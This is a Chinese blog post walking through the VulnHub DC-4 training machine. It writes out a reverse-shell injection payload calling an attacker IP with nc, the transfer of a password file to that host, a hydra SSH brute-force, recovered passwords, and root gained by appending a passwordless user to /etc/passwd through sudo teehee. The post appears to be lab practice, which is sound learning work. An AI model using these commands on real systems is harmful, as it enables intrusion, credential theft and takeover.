vulnhub靶机:DC-4

最新推荐文章于 2024-09-14 13:45:00 发布
最新推荐文章于 2024-09-14 13:45:00 发布
阅读量584 收藏 9
点赞数 14
分类专栏: Vulnhub靶机 文章标签: web安全 网络安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/141201119
版权

目录

导入靶机

信息收集

发现IP

目录扫描

端口扫描

访问 web

弱口令爆破

反弹shell

获得交互式 shell

提权

使用 hydra 暴力破解

SSH 连接 jim 用户

登录charles账户

使用 teehee 创建 root 用户

导入靶机

点击重试

然后网卡换成 NAT模式,开启靶机

信息收集

发现IP

arp-scan -l

发现靶机是 192.168.109.162

目录扫描

python3 dirsearch.py -u 192.168.109.162

扫出来的目录基本都是跳转到了 index.php

端口扫描

nmap -p- -A 192.168.109.162

发现只有 22 和 80 端口

访问 web

弱口令爆破

准备用Burp 爆破来着,但突然发现密码 admin 可以登录上去

发现可以执行系统命令,然后抓包,发现 radio 这里可以修改命令

反弹shell

在 kali 开启监听端口

nc -lvvp 8888

替换 payload,然后发包,返回 kali 发现反弹shell 成功

nc+-e+/bin/bash+192.168.109.139+8888

获得交互式 shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

进入根目录的家目录,经过一番查看在 jim 用户下发现了一个密码字典

通过 nc 把 old-passwords.bak 的内容传入到 kali,用于 ssh 的暴力破解

先在 kali 用 nc 监听一个端口 4444,并把监听到的数据写入 pwd.txt

rlwrap nc -lvnp 4444 > pwd.txt

 nc 192.168.109.139 4444 < old-passwords.bak

发现传入成功

使用 hydra 暴力破解

  • -l: 指定用户 jim
  • -P:指定密码字典
  • -vV:显示详细信息
  • -f:破解成功之后立马停止爆破
hydra -l jim -P pwd.txt -vV -f ssh://192.168.109.162

破解得到 jim 的密码是 jibril04

SSH 连接 jim 用户

ssh jim@192.168.109.162

继续查看 jim 用户里的内容

cat /home/jim/mbox

看上去像是邮件,再去 /var/mail 查看邮件

cat /var/mail/jim

发现了 Charles 的密码是 ^xHhA&hvim0y

登录charles账户

ssh charles@192.168.109.162

sudo -l

发现 charles 用户有执行 teehee 命令的权限

使用 teehee 创建 root 用户

echo "egg::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
tail -l /etc/passwd

在 jim 用户切换 root 权限用户,然后在 root 目录发现了 flag.txt 文件,在里面发现了 flag

燕雀安知鸿鹄之志哉.
关注
专栏目录
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2509
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-4暴力破解——新手进阶4
m0_75051044的博客
03-22 1473
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
Vulnhub靶机:DC-4渗透详细过程
菜鸟学渗透
04-29 401
Vulnhub靶机:DC-4渗透详细过程
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4156
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 778
Vulnhub靶机:DC-1渗透详细过程
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 388
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vulnhub靶机实战DC-3
Varin
06-04 981
vulnhub靶机实战DC-3
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 394
DC-1详解
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1713
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3662
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2991
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 778
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 478
y0usef靶机渗透实例
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-14 1118
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 1133
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1753
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
VulnHub入门教程:DC-1靶场攻破指南
4. **旗标寻找**:靶机中有五个旗标,它们可能是用来引导学习者的线索。对于初学者,这些旗标可能会提供一些关于系统漏洞或弱点的提示。 5. **逐步升级权限**:虽然不是必须的,但获取 root 权限是挑战的最终目标。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值